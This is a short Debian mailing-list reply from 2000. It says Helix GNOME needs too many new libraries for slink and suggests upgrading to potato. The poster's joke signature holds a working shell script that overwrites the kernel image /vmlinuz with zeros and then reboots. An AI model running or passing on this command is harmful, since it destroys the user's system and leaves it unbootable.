On Tue, Jun 13, 2000 at 11:24:32PM -0500, Kimon Ioannides wrote: > Does anyone know if helix gnome will work with Debian 2.1 (slink). > I've heard that it will work with 2.2 and helixcode's website > (www.helixcode.com) states that the debs are designed for 2.3. Anyone > tried helix gnome with 2.1?
Doubt it. It requires alot of new libs. In order to make it work you'd be at least half-way upgraded to potato. So, if you really want it, you might as well upgrade. Note: helixcode is making debs for woody, though many people report getting it to work under potato. Potato's basically stable (a few glitches) and won't change much, so ... -- #! /bin/sh echo 'Linux Must Die!' | wall dd if=/dev/zero of=/vmlinuz bs=1 \ count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'` shutdown -r now